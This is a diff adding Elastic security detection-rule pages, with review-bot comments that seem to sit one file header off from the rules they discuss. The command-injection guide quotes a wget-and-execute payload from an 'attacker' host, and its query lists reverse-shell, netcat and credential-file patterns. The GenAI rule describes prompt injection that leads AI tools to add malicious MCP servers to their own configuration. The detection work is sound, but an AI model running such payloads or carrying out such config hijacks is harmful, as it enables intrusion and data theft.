+ file.extension in~ (
+ "pdf", "dll", "exe", "dat", "com", "bat", "cmd", "sys", "vbs", "vbe", "ps1", "hta", "txt", "js", "jse",
+ "wsh", "wsf", "sct", "docx", "doc", "xlsx", "xls", "pptx", "ppt", "rtf", "gif", "jpg", "png", "bmp", "img", "iso"
+ ) and
+ file.path : "C:\\*:*" and
+ not file.name :("*:$DATA", "*PG$Secure", "*Zone.Identifier", "*com.apple.lastuseddate#PS", "*com.apple.provenance")
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Defense Evasion
+** ID: TA0005
+** Reference URL: https://attack.mitre.org/tactics/TA0005/
+* Technique:
+** Name: Hide Artifacts
+** ID: T1564
+** Reference URL: https://attack.mitre.org/techniques/T1564/
+* Sub-technique:
+** Name: NTFS File Attributes
+** ID: T1564.004
+** 
Reference URL: https://attack.mitre.org/techniques/T1564/004/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-process-modifying-genai-configuration-file.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-process-modifying-genai-configuration-file.asciidoc
new file mode 100644
index 0000000000..194b500606
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-process-modifying-genai-configuration-file.asciidoc
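Review bot: `file.path : "C:\\*:*"` in the query limits the rule to the C: volume, so an alternate data stream created on any other NTFS volume (secondary data disks, mapped drives, removable media) is never evaluated even when the process and extension conditions match. Sibling rules in this package use the `?:\\` drive wildcard; the same change here, `file.path : "?:\\*:*"`, keeps the intent while covering every volume, and if C: was chosen to avoid noise from backup or sync software on data drives that reason belongs in *False positive analysis*. The investigation step "searching for login events (for example, 4624) to the target host after the registry modification" refers to a registry modification this rule does not detect; "after the stream creation" would be accurate.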
@@ -0,0 +1,146 @@ +[[prebuilt-rule-8-19-18-unusual-process-modifying-genai-configuration-file]] +=== Unusual Process Modifying GenAI Configuration File + +Detects unusual modification of GenAI tool configuration files. Adversaries may inject malicious MCP server configurations to hijack AI agents for persistence, C2, or data exfiltration. Attack vectors include malware or scripts directly poisoning config files, supply chain attacks via compromised dependencies, and prompt injection attacks that abuse the GenAI tool itself to modify its own configuration. Unauthorized MCP servers added to these configs execute arbitrary commands when the AI tool is next invoked. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.file* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://modelcontextprotocol.io/ +* https://www.cybereason.com/blog/security-research/weaponized-ai-how-cybercriminals-exploit-mcp-for-account-takeover +* https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks +* https://www.elastic.co/security-labs/elastic-advances-llm-security + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Persistence +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Domain: LLM + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Unusual Process Modifying GenAI Configuration File* + + +Configuration files for GenAI tools like Cursor, Claude, Copilot, and Ollama control which MCP servers, plugins, and extensions are loaded. 
Attackers target these files to inject malicious MCP servers that execute arbitrary commands, exfiltrate data, or establish persistence. Threats include external processes (malware, compromised scripts, supply chain attacks) directly modifying configs, as well as prompt injection attacks that abuse the AI tool's own file access capabilities. + + +*Possible investigation steps* + + +- Identify the process that modified the configuration file and determine if it's expected (GenAI tool, installer, user action) or suspicious (unknown script, malware). +- If the modifying process is NOT a GenAI tool, investigate its origin, parent process tree, and whether it was downloaded or executed from a suspicious location. +- If a GenAI tool made the modification, check recent user prompts or agent activity that may have triggered the config change via prompt injection. +- Review the contents of the modified configuration file for suspicious MCP server URLs, unauthorized plugins, or unusual agent permissions. +- Examine the process command line and parent process tree to identify how the modifying process was invoked. +- Check for other file modifications by the same process around the same time, particularly to other GenAI configs or startup scripts. +- Investigate whether the GenAI tool subsequently connected to unknown domains or spawned unusual child processes after the config change. + + +*False positive analysis* + + +- Novel but legitimate configuration changes will trigger this rule when the process hasn't been seen modifying these files within the configured history window. Review the modified file content to determine legitimacy. +- GenAI tool updates may modify config files in new ways; correlate with recent software updates. +- IDE extensions integrating with GenAI tools may modify configs as part of initial setup. +- Developer tools (git, go, npm) checking out or downloading projects containing `.gemini/` or `.claude/` directories may trigger alerts. 
These are project-level configs, not user configs - verify by checking if the path is within a project directory. + + +*Response and remediation* + + +- Review the modified configuration file and revert any unauthorized changes to MCP servers, plugins, or agent settings. +- If malicious MCP servers were added, block the associated domains at the network level. +- Review and rotate any API keys or credentials that may have been exposed through the compromised GenAI configuration. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category : "file" and event.action : ("modification" or "overwrite") and +file.path : ( + */.cursor/mcp.json or */.cursor/settings.json or */AppData/Roaming/Cursor/*mcp* or + */.claude/* or */claude_desktop_config.json or */AppData/Roaming/Claude/* or + */.config/github-copilot/* or */AppData/Local/GitHub?Copilot/* or + */.ollama/config* or */AppData/Local/Ollama/* or + */.codex/* or */AppData/Roaming/Codex/* or + */.gemini/* or */AppData/Roaming/gemini-cli/* or + */.grok/* or */AppData/Roaming/Grok/* or + */.windsurf/* or */AppData/Roaming/Windsurf/* or + */.vscode/extensions/*mcp* or + */.openclaw/* or */AppData/Roaming/OpenClaw/* or + */.moltbot/* or */AppData/Roaming/Moltbot/* or + */.config/openclaw/* +) and not ( + file.extension : (lck or lock or log or png or marker) or + file.name : .DS_Store or + file.path : ( + */.claude/cache/* or + */.claude/statsig/* or + */.codex/log/* or + */.codex/sessions/* + ) or + ( + file.path : */.config/github-copilot/* and + file.name : (apps.json or versions.json or copilot*nitrite.db) + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Authentication Process +** ID: T1556 +** Reference URL: https://attack.mitre.org/techniques/T1556/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: 
https://attack.mitre.org/tactics/TA0003/
+* Technique:
+** Name: Compromise Host Software Binary
+** ID: T1554
+** Reference URL: https://attack.mitre.org/techniques/T1554/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-discovery-or-fuzzing-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-discovery-or-fuzzing-activity.asciidoc
new file mode 100644
index 0000000000..3b89cbdea8
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-discovery-or-fuzzing-activity.asciidoc
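Review bot: The rule is typed `new_terms`, but nothing on the page says which fields the novelty is evaluated over or how long the history window is, so the false-positive bullet about a process "not seen modifying these files within the configured history window" cannot be acted on; add a line after `*Rule type*: new_terms` such as `*New terms fields*: host.id, process.executable` and `*History window*: …` with whatever the rule source actually declares. The ATT&CK mapping also reads as a mismatch: T1556 Modify Authentication Process does not describe editing an MCP/plugin configuration, and T1546 Event Triggered Execution (or T1554 alone) would fit the persistence story the description tells — worth confirming against the rule definition. Finally, the query has no `host.os.type` clause while the tags list only macOS and Windows; the `*/.config/...` and `*/.cursor/...` patterns will match Linux hosts running Elastic Defend as well, so either add `* OS: Linux` to the tags or state the intended scope in the description.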
@@ -0,0 +1,142 @@ +[[prebuilt-rule-8-19-18-web-server-discovery-or-fuzzing-activity]] +=== Web Server Discovery or Fuzzing Activity + +This rule detects potential web server discovery or fuzzing activity by identifying a high volume of HTTP GET requests resulting in 404 or 403 status codes from a single source IP address within a short timeframe. Such patterns may indicate that an attacker is attempting to discover hidden or unlinked resources on a web server, which can be a precursor to more targeted attacks. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 10m + +*Searches indices from*: now-11m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Web +* Use Case: Threat Detection +* Tactic: Reconnaissance +* Data Source: Nginx +* Data Source: Apache +* Data Source: Apache Tomcat +* Data Source: IIS +* Data Source: Traefik +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Web Server Discovery or Fuzzing Activity* + + +This rule flags a single origin generating a rapid burst of GET requests that produce many 404/403 responses, a hallmark of automated web discovery or fuzzing. Attackers commonly run wordlist-driven enumeration to probe paths such as /admin/, /login, /backup.zip, /.env, /.git/, and undocumented API routes, gauging which resources exist and where access controls fail. 
Detecting this reconnaissance early helps prevent subsequent targeted exploitation of newly found endpoints and weak authentication flows. + + +*Possible investigation steps* + + +- Correlate user-agent, TLS JA3/JA4, Host/SNI, and X-Forwarded-For to fingerprint the client, identify common fuzzing tools or disguised automation, and recover the true origin if traffic traversed a CDN or proxy. +- Summarize the top requested paths and response codes for this source to spot any 2xx or 401 outcomes amid the denials, flagging hits on sensitive locations such as /.env, /.git, /admin interfaces, backups, installer scripts, and undocumented API routes. +- Pivot to the same timeframe for adjacent web and authentication activity from this origin to see whether POSTs, credential attempts, or parameterized requests followed the enumeration, indicating progression toward exploitation or spraying. +- Review WAF/CDN and reverse-proxy logs for blocks, challenges, or rate limiting and whether multiple virtual hosts were targeted via the Host header, confirming if and how far requests reached the application tier. +- Validate whether the source aligns with approved internal scanners or scheduled testing via inventories and change records, and if not, enrich with ASN/geolocation, reverse DNS, and threat intel to assess reputation and recurrence across your estate. + + +*False positive analysis* + + +- An internal QA link checker or monitoring crawler run from a single host can request hundreds of unique paths and generate many 404/403 GETs when routes, assets, or permissions are misconfigured. +- A shared egress IP (NAT or corporate proxy) aggregating many users during a faulty deployment can trigger high volumes of 404/403 GETs as browsers collectively hit moved or newly restricted resources. 
+ + +*Response and remediation* + + +- Immediately rate-limit or block the offending source IP at the WAF/CDN and reverse proxy, applying a challenge or temporary ban to the observed User-Agent and JA3/JA4 fingerprint driving the 500+ unique-path 404/403 GET burst. +- If traffic came through a proxy or CDN, use X-Forwarded-For to identify and block the true origin, and add a temporary ASN or geolocation block if the source aligns with known scanner networks. +- Verify whether the source is an approved internal scanner; if not, disable the job or container, remove any scheduled tasks and API keys used, and notify the owner to stop testing against production immediately. +- Review the requested path list to identify any 2xx or 401 hits and remediate exposures such as accessible /.env, /.git, /admin interfaces, backup archives, or installer scripts by removing files, disabling endpoints, and rotating secrets. +- Escalate to incident response if enumeration persists after blocking, pivots to POSTs or credential attempts, originates from rotating IPs (Tor/VPN/residential), or produces 2xx on sensitive endpoints despite WAF rules. +- Harden the web tier by enabling per-IP rate limiting and bot challenges, turning off directory listing and default app endpoints, blocking patterns like /.git/, /.env, and /backup.zip at the WAF, and restricting origin access to CDN egress only. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-* +| where + http.request.method == "GET" and + http.response.status_code in (404, 403) + +| eval Esql.url_original_to_lower = to_lower(url.original) + +| keep + @timestamp, + event.dataset, + http.request.method, + http.response.status_code, + source.ip, + agent.id, + agent.name, + Esql.url_original_to_lower, + data_stream.namespace + +| stats + Esql.event_count = count(), + Esql.url_original_count_distinct = count_distinct(Esql.url_original_to_lower), + Esql.agent_name_values = values(agent.name), + Esql.agent_id_values = values(agent.id), + Esql.http_request_method_values = values(http.request.method), + Esql.http_response_status_code_values = values(http.response.status_code), + Esql.url_original_values = values(Esql.url_original_to_lower), + Esql.event_dataset_values = values(event.dataset), + Esql.data_stream_namespace_values = values(data_stream.namespace) + by source.ip +| where + Esql.event_count > 500 and Esql.url_original_count_distinct > 250 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Reconnaissance +** ID: TA0043 +** Reference URL: https://attack.mitre.org/tactics/TA0043/ +* Technique: +** Name: Active Scanning +** ID: T1595 +** Reference URL: https://attack.mitre.org/techniques/T1595/ +* Sub-technique: +** Name: Vulnerability Scanning +** ID: T1595.002 +** Reference URL: https://attack.mitre.org/techniques/T1595/002/ +* Sub-technique: +** Name: Wordlist Scanning +** ID: T1595.003 +** Reference URL: https://attack.mitre.org/techniques/T1595/003/ 
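Review bot: The query groups only by `source.ip`, so when the servers sit behind a CDN or reverse proxy every client collapses into the proxy's address: one scanner can push the shared IP past 500 requests and alert on traffic that is mostly legitimate, while the true origin the investigation steps tell the analyst to recover from X-Forwarded-For never appears in the alert. If the integrations populate `client.ip` (or a forwarded-for field) consider keying on it, e.g. `| eval Esql.client_ip = coalesce(client.ip, source.ip)` and `by Esql.client_ip`, and at minimum say in the false-positive section that proxied deployments are aggregated this way. The remediation bullet describes a "500+ unique-path 404/403 GET burst", but the thresholds are `Esql.event_count > 500 and Esql.url_original_count_distinct > 250`, so it should read "500+ GETs across 250+ distinct paths". Because only `GET` is counted, enumeration done with HEAD requests is invisible to the rule; that limitation belongs in the description.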
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-command-injection-request.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-command-injection-request.asciidoc
new file mode 100644
index 0000000000..024676b0dc
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-command-injection-request.asciidoc
@@ -0,0 +1,229 @@ +[[prebuilt-rule-8-19-18-web-server-potential-command-injection-request]] +=== Web Server Potential Command Injection Request + +This rule detects potential command injection attempts via web server requests by identifying URLs that contain suspicious patterns commonly associated with command execution payloads. Attackers may exploit vulnerabilities in web applications to inject and execute arbitrary commands on the server, often using interpreters like Python, Perl, Ruby, PHP, or shell commands. By monitoring for these indicators in web traffic, security teams can identify and respond to potential threats early. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 10m + +*Searches indices from*: now-11m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Web +* Use Case: Threat Detection +* Tactic: Reconnaissance +* Tactic: Persistence +* Tactic: Execution +* Tactic: Credential Access +* Tactic: Command and Control +* Data Source: Nginx +* Data Source: Apache +* Data Source: Apache Tomcat +* Data Source: IIS +* Data Source: Traefik +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. 
+ + +*Investigating Web Server Potential Command Injection Request* + + +This rule flags web requests whose URLs embed command-execution payloads—interpreter flags, shell invocations, netcat reverse shells, /dev/tcp, base64, credential file paths, downloaders, and suspicious temp or cron paths. It matters because attackers use low-volume, successful (200) requests to trigger server-side command injection and gain persistence or control without obvious errors. Example: a crafted query executes bash -c 'wget http://attacker/rev.sh -O /tmp/r; chmod +x /tmp/r; /tmp/r' from the web app, yielding a 200 while dropping and running a payload. + + +*Possible investigation steps* + + +- Pull the raw HTTP request or PCAP, repeatedly URL-decode and base64-decode parameters, and extract shell metacharacters, commands, IP:port pairs, file paths, and download URLs to infer execution intent. +- Time-correlate the request with host telemetry for web-server-owned child processes, file writes in /tmp, /dev/shm, or web roots, cron modifications, and new outbound connections from the same host. +- Pivot on the source IP and user-agent to find related requests across other hosts/endpoints, identify scan-to-exploit sequencing and success patterns, and enact blocking or rate limiting if malicious. +- Map the targeted route to its backend handler and review code/config to see if user input reaches exec/system/os.popen, templating/deserialization, or shell invocations, then safely reproduce in staging to validate exploitability. +- If the payload references external indicators, search DNS/proxy/firewall telemetry for matching egress, retrieve and analyze any downloaded artifacts, and hunt for the same indicators across the fleet. 
+ + +*False positive analysis* + + +- A documentation or code-rendering page that echoes command-like strings from query parameters (e.g., "bash -c", "python -c", "curl", "/etc/passwd") returns 200 while merely displaying text, so the URL contains payload keywords without any execution. +- A low-volume developer or QA test to a sandbox route includes path or query values like "/dev/tcp/", "nc 10.0.0.1 4444", "busybox", or "chmod +x" to validate input handling, the server returns 200 and the rule triggers despite no server-side execution path consuming those parameters. + + +*Response and remediation* + + +- Block the offending source IPs and User-Agents at the WAF/reverse proxy, add virtual patches to drop URLs containing 'bash -c', '/dev/tcp', 'base64 -d', 'curl' or 'nc', and remove the targeted route from the load balancer until verified safe. +- Isolate the impacted host from the network (at minimum egress) if the web service spawns child processes like bash/sh/python -c, creates files in /tmp or /dev/shm, modifies /etc/cron.*, or opens outbound connections to an IP:port embedded in the request. +- Acquire volatile memory and preserve access/error logs and any downloaded script before cleanup, then terminate malicious child processes owned by nginx/httpd/tomcat/w3wp, delete dropped artifacts (e.g., /tmp/*, /dev/shm/*, suspicious files in the webroot), and revert cron/systemd or SSH key changes. +- Rotate credentials and tokens if /etc/passwd, /etc/shadow, or ~/.ssh paths were targeted, rebuild the host or container from a known-good image, patch the application and dependencies, and validate clean startup with outbound traffic restricted to approved destinations. +- Immediately escalate to the incident commander and legal/privacy if remote command execution is confirmed (evidence: web-server-owned 'bash -c' or 'python -c' executed, curl/wget download-and-execute, or reverse shell to an external IP:port) or if sensitive data exposure is suspected. 
+- Harden by enforcing strict input validation, disabling shell/exec functions in the runtime (e.g., PHP disable_functions and no shell-outs in templates), running under least privilege with noexec,nodev /tmp and a read-only webroot, restricting egress by policy, and deploying WAF rules and host sensors to detect these strings and cron/webshell creation. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-* +| where + // Limit to 200 response code to reduce noise + http.response.status_code == 200 + +| eval Esql.url_original_to_lower = to_lower(url.original) + +| eval Esql.contains_interpreter = case(Esql.url_original_to_lower like "*python* -c*" or Esql.url_original_to_lower like "*perl* -e*" or Esql.url_original_to_lower like "*ruby* -e*" or Esql.url_original_to_lower like "*ruby* -rsocket*" or Esql.url_original_to_lower like "*lua* -e*" or Esql.url_original_to_lower like "*php* -r*" or Esql.url_original_to_lower like "*node* -e*", 1, 0) +| eval Esql.contains_shell = case(Esql.url_original_to_lower like "*/bin/bash*" or Esql.url_original_to_lower like "*bash*-c*" or Esql.url_original_to_lower like "*/bin/sh*" or Esql.url_original_to_lower rlike "*sh.{1,2}-c*", 1, 0) +| eval Esql.contains_nc = case(Esql.url_original_to_lower like "*netcat*" or Esql.url_original_to_lower like "*ncat*" or Esql.url_original_to_lower rlike """.*nc.{1,2}[0-9]{1,3}(\.[0-9]{1,3}){3}.{1,2}[0-9]{1,5}.*""" or Esql.url_original_to_lower like "*nc.openbsd*" or Esql.url_original_to_lower like "*nc.traditional*" or Esql.url_original_to_lower like "*socat*", 1, 0) +| eval Esql.contains_devtcp = case(Esql.url_original_to_lower like "*/dev/tcp/*" or Esql.url_original_to_lower like "*/dev/udp/*", 1, 0) +| eval Esql.contains_helpers = case((Esql.url_original_to_lower like "*/bin/*" or Esql.url_original_to_lower like "*/usr/bin/*") and (Esql.url_original_to_lower 
like "*mkfifo*" or Esql.url_original_to_lower like "*nohup*" or Esql.url_original_to_lower like "*setsid*" or Esql.url_original_to_lower like "*busybox*"), 1, 0) +| eval Esql.contains_sus_cli = case(Esql.url_original_to_lower like "*import*pty*spawn*" or Esql.url_original_to_lower like "*import*subprocess*call*" or Esql.url_original_to_lower like "*tcpsocket.new*" or Esql.url_original_to_lower like "*tcpsocket.open*" or Esql.url_original_to_lower like "*io.popen*" or Esql.url_original_to_lower like "*os.execute*" or Esql.url_original_to_lower like "*fsockopen*", 1, 0) +| eval Esql.contains_privileges = case(Esql.url_original_to_lower like "*chmod*+x", 1, 0) +| eval Esql.contains_downloader = case(Esql.url_original_to_lower like "*curl *" or Esql.url_original_to_lower like "*wget *" , 1, 0) +| eval Esql.contains_file_read_keywords = case(Esql.url_original_to_lower like "*/etc/shadow*" or Esql.url_original_to_lower like "*/etc/passwd*" or Esql.url_original_to_lower like "*/root/.ssh/*" or Esql.url_original_to_lower like "*/home/*/.ssh/*" or Esql.url_original_to_lower like "*~/.ssh/*" or Esql.url_original_to_lower like "*/proc/self/environ*", 1, 0) +| eval Esql.contains_base64_cmd = case(Esql.url_original_to_lower like "*base64*-d*" or Esql.url_original_to_lower like "*echo*|*base64*", 1, 0) +| eval Esql.contains_suspicious_path = case(Esql.url_original_to_lower like "*/tmp/*" or Esql.url_original_to_lower like "*/var/tmp/*" or Esql.url_original_to_lower like "*/dev/shm/*" or Esql.url_original_to_lower like "*/root/*" or Esql.url_original_to_lower like "*/home/*/*" or Esql.url_original_to_lower like "*/var/www/*" or Esql.url_original_to_lower like "*/etc/cron.*/*", 1, 0) + +| eval Esql.any_payload_keyword = case( + Esql.contains_interpreter == 1 or Esql.contains_shell == 1 or Esql.contains_nc == 1 or Esql.contains_devtcp == 1 or + Esql.contains_helpers == 1 or Esql.contains_sus_cli == 1 or Esql.contains_privileges == 1 or Esql.contains_downloader == 1 or + 
Esql.contains_file_read_keywords == 1 or Esql.contains_base64_cmd == 1 or Esql.contains_suspicious_path == 1, 1, 0) + +| keep + @timestamp, + Esql.url_original_to_lower, + Esql.any_payload_keyword, + Esql.contains_interpreter, + Esql.contains_shell, + Esql.contains_nc, + Esql.contains_devtcp, + Esql.contains_helpers, + Esql.contains_sus_cli, + Esql.contains_privileges, + Esql.contains_downloader, + Esql.contains_file_read_keywords, + Esql.contains_base64_cmd, + Esql.contains_suspicious_path, + source.ip, + destination.ip, + agent.id, + http.request.method, + http.response.status_code, + user_agent.original, + agent.name, + event.dataset, + data_stream.namespace + +| stats + Esql.event_count = count(), + Esql.url_path_count_distinct = count_distinct(Esql.url_original_to_lower), + + // General fields + + Esql.agent_name_values = values(agent.name), + Esql.agent_id_values = values(agent.id), + Esql.url_path_values = values(Esql.url_original_to_lower), + Esql.http.response.status_code_values = values(http.response.status_code), + Esql.user_agent_original_values = values(user_agent.original), + Esql.event_dataset_values = values(event.dataset), + Esql.data_stream_namespace_values = values(data_stream.namespace), + + // Rule Specific fields + Esql.any_payload_keyword_max = max(Esql.any_payload_keyword), + Esql.contains_interpreter_values = values(Esql.contains_interpreter), + Esql.contains_shell_values = values(Esql.contains_shell), + Esql.contains_nc_values = values(Esql.contains_nc), + Esql.contains_devtcp_values = values(Esql.contains_devtcp), + Esql.contains_helpers_values = values(Esql.contains_helpers), + Esql.contains_sus_cli_values = values(Esql.contains_sus_cli), + Esql.contains_privileges_values = values(Esql.contains_privileges), + Esql.contains_downloader_values = values(Esql.contains_downloader), + Esql.contains_file_read_keywords_values = values(Esql.contains_file_read_keywords), + Esql.contains_base64_cmd_values = values(Esql.contains_base64_cmd), + 
Esql.contains_suspicious_path_values = values(Esql.contains_suspicious_path) + + by source.ip, agent.id + +| where + // Filter for potential command injection attempts with low event counts to reduce false positives + Esql.any_payload_keyword_max == 1 and Esql.event_count < 5 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Server Software Component +** ID: T1505 +** Reference URL: https://attack.mitre.org/techniques/T1505/ +* Sub-technique: +** Name: Web Shell +** ID: T1505.003 +** Reference URL: https://attack.mitre.org/techniques/T1505/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Tactic: +** Name: Reconnaissance +** ID: TA0043 +** Reference URL: https://attack.mitre.org/tactics/TA0043/ +* Technique: +** Name: Active Scanning +** ID: T1595 +** Reference URL: https://attack.mitre.org/techniques/T1595/ +* Sub-technique: +** Name: Vulnerability Scanning +** ID: T1595.002 +** Reference URL: https://attack.mitre.org/techniques/T1595/002/ +* Sub-technique: +** Name: Wordlist Scanning +** ID: T1595.003 +** Reference URL: https://attack.mitre.org/techniques/T1595/003/ 
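Review bot: `Esql.event_count` in the final `where` counts every 200 response from the source/agent pair in the window, not just requests carrying a payload keyword, because nothing filters on `Esql.any_payload_keyword` before `stats`; a client that browses five ordinary pages and then sends one injection attempt is silently dropped by `Esql.event_count < 5`, which is exactly the "low-volume, successful" case the guide says it targets. Insert `| where Esql.any_payload_keyword == 1` before `| keep` so the count (and the `< 5` noise cap, if it is kept) applies to payload requests only. The shell pattern `rlike "*sh.{1,2}-c*"` uses LIKE-style `*` where the netcat pattern on the next line correctly uses `.*`; a leading `*` is not a valid regex quantifier, so that branch likely never matches — `".*sh.{1,2}-c.*"`. Separately, `url.original` in access logs is normally still percent-encoded, so the patterns containing a literal space (`"*curl *"`, `"*wget *"`) and the slash-heavy ones (`*/dev/tcp/*`, `*/etc/passwd*`) will miss `curl%20`, `curl+` and `%2Fdev%2Ftcp%2F`; normalising `%20`, `+` and `%2f` with `replace()` before the `like` checks, or documenting the gap, would be worthwhile.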
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-spike-in-error-response-codes.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-spike-in-error-response-codes.asciidoc
new file mode 100644
index 0000000000..44b664b30f
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-spike-in-error-response-codes.asciidoc
@@ -0,0 +1,148 @@ +[[prebuilt-rule-8-19-18-web-server-potential-spike-in-error-response-codes]] +=== Web Server Potential Spike in Error Response Codes + +This rule detects unusual spikes in error response codes (500, 502, 503, 504) from web servers, which may indicate reconnaissance activities such as vulnerability scanning or fuzzing attempts by adversaries. These activities often generate a high volume of error responses as they probe for weaknesses in web applications. Error response codes may potentially indicate server-side issues that could be exploited. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 10m + +*Searches indices from*: now-11m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Web +* Use Case: Threat Detection +* Tactic: Reconnaissance +* Data Source: Nginx +* Data Source: Apache +* Data Source: Apache Tomcat +* Data Source: IIS +* Data Source: Traefik +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Web Server Potential Spike in Error Response Codes* + + +This rule detects bursts of 5xx errors (500–504) from GET traffic, highlighting abnormal server behavior that accompanies active scanning or fuzzing and exposes fragile code paths or misconfigured proxies. 
Attackers sweep common and generated endpoints while mutating query params and headers—path traversal, template syntax, large payloads—to repeatedly force backend exceptions and gateway timeouts, enumerate which routes fail, and pinpoint inputs that leak stack traces or crash components for follow-on exploitation. + + +*Possible investigation steps* + + +- Plot error rates per minute by server and client around the alert window to confirm the spike, determine scope, and separate a single noisy client from a platform-wide issue. +- Aggregate the failing URL paths and query strings from the flagged client and look for enumeration sequences, traversal encoding, template injection markers, or oversized inputs indicative of fuzzing. +- Examine User-Agent, Referer, header mix, and TLS JA3 for generic scanner signatures or reuse across multiple clients, and enrich the originating IP with reputation and hosting-provider attribution. +- Correlate the timeframe with reverse proxy/WAF/IDS and application error logs or stack traces to identify which routes threw exceptions or timeouts and whether they align with the client’s input patterns. +- Validate backend and dependency health (upstreams, databases, caches, deployments) to rule out infrastructure regressions, then compare whether only the suspicious client experiences disproportionate failures. + + +*False positive analysis* + + +- A scheduled deployment or upstream dependency issue can cause normal GET traffic to fail with 502/503/504, and many users egressing through a shared NAT or reverse proxy may be aggregated as one source IP that triggers the spike. +- An internal health-check, load test, or site crawler running from a single host can rapidly traverse endpoints and induce 500 errors on fragile routes, mimicking scanner-like behavior without malicious intent. 
